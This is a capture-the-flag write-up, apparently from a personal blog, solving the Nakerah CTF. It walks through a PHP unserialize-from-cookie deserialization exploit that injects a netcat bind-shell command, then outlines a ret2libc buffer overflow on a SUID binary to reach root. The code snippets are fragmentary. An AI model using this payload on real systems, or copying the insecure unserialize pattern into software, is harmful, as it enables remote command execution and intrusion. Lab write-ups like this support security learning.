
infosec guy who seeks knowledge

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Nakerah CTF

Peace, mercy and blessings of God

today we are going to solve an interesting CTF from Nakerah!

our goal is to read root’s flag
expolit will be devided into two missions first deserilization attack then ret2libc

so with all that being said; let’s right jump in !!

First mission

first we have that static page

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looking around source code nothing interested there

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so let’s nmap it

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as we see we have some other ports

so lets visit port 8080 and see what behind the scene

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just another blank page (: i get bored so let’s gobuster it :XD

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we have /backup file seems to be interesting let’s dump it

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after downloading the file it’s php code

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# analysis of code

 class exCommand{
        public function __destruct(){
class Hello{
        private $name;
        private $role;
        private $isSet;
        public function check(){
public function printHello(){
                echo "<br >" . $_COOKIE['name']."<br /><br /><br />";
                echo "Hello " . $this->name . "<br>";
                echo "your role is " . $this->role . "\n";
                echo "<br ><br ><br >";
                echo "good";
$obj = unserialize($_COOKIE['name']);
so  stay focus here 
it's `deserilization attack` and we need to pass our command to exCommand function which has that magic method
we have two problems 
first with exCommand class we used a property command without identifying it so in our exploit 
we will have to pass it to an object and  give it a vlaue
second problem  we have to bypass that cookie checks so let's write our exploit code
the trick here is if we bypass check function it will just print some staff 
if we try to target our exCommand class it will fail with check function so ...

so we will create exCommand object, identify command property with a value (our command) put it inside Hello calss and selialize all that staff together

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code analysis:

class exCommand{
   public function __destruct()}
$x = new exCommand;
$x->command = "nc -lnvp 9999 -e /bin/bash";
create our object and give the command property our target command (bind shell)$y = new Hello;
class Hello{
        public $name;
        public $role;
        public $isSet;
        public $dummy;
$y->name = "fady";
$y->role = "hacker";
$y->isSet = 1;
$y->dummy = $x;
print serialize($y);

here is our final serialized data

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and let’s try connect

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fisrt mission completed successfully

Second mission

in the root dir we got README file

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NX which stand for non-executable so here we know it’s BOF expolit with ret2libc

after some enum we got that interesting suid file

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so after getting it in our local machine to understand it better

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we can identify that NX is enabled trying to run it gives seg fault after trying passing some args it just exit

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so let’s create our buffer with msf-patter-create and fire up gdb to get the exact offset

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to get things more easily let’s check ASLR in the vectim machine

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and happy news will make our life easier so hence we will work in our target machine to get some address

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we got addresses of system and exit now we need address of /bin/sh

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to get the exact address of /bin/sh in the run time we add its address to the starting of libc address

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now our exploit is complete lets have a lock at it

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now let’s give it a try

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and finally i want to say to Nakerah team “You're the best.” 

and oxf1f1 “You knocked me off my feet!”